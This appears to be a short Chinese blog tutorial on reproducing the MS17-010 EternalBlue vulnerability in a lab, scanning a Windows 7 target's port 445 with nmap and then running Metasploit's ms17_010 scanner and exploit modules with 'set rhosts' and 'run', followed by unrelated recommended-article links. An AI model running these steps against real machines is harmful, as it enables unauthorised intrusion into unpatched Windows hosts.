ms 17-010 永恒之蓝复现

漏洞复现

复现环境

攻击机:kali2021(172.168.1.107)

靶机:Windows 7(192.168.1.121)

复现过程

1.扫描靶机端口

使用nmap对靶机进行端口扫描

可以看到,靶机的445端口是开放的,而永恒之蓝利用的就是445端口的SMB服务, 可以使用此漏洞

2、找到漏洞模块

输入msfconsole,进入平台

每次进入都会有一个花里胡哨的图标

输入search ms17_010

3、使用扫描模块,对靶机进行扫描

连接模块

use 3

设置目标靶机IP

set rhosts IP

执行run

如果没有报错就是可以(报错的时候执行代码是红色的)

4、 使用模块进行操作

连接模块

use 0

设置目标IP

set rhosts IP

执行 run

完成复现

相关推荐
十五年专注C++开发14 小时前
cpolar(极点云): 一款主流的内网穿透工具
linux·windows·cpolar·穿透
非凡ghost14 小时前
AIMP(音乐播放软件)
前端·windows·音视频·firefox
xifangge202514 小时前
【2026终极解法】彻底解决“由于找不到 msvcp140.dll,无法继续执行代码”报错(附微软运行库一键修复包)
windows·mysql·microsoft·报错·开发环境
摇滚侠14 小时前
Windows 查看占用端口的进程,并关闭进程
windows
汤姆yu14 小时前
Windows系统下TRAE的安装与完整使用教程
windows·ai·trae·ai编程工具
一个人旅程~15 小时前
在M系列的macbook上如何使用VMware安装ARM版的Win11以及注意哪些问题?
linux·windows·经验分享·macos·电脑
love530love15 小时前
Windows 下 vcpkg 依赖环境部署与全局化配置
人工智能·windows·vcpkg
jolimark16 小时前
Windows下如何用GCC编译C语言?轻便方法分享
c语言·windows·git·mingw·gcc编译器
航Hang*16 小时前
Windows Server 配置与管理——第7章:配置DNS服务器
运维·服务器·网络·windows·安全·虚拟化
LinuxGeek102417 小时前
windows安装crest-3.0.2-windows和xtb-6.7.1,windows版crest-3.0.2
windows·量子计算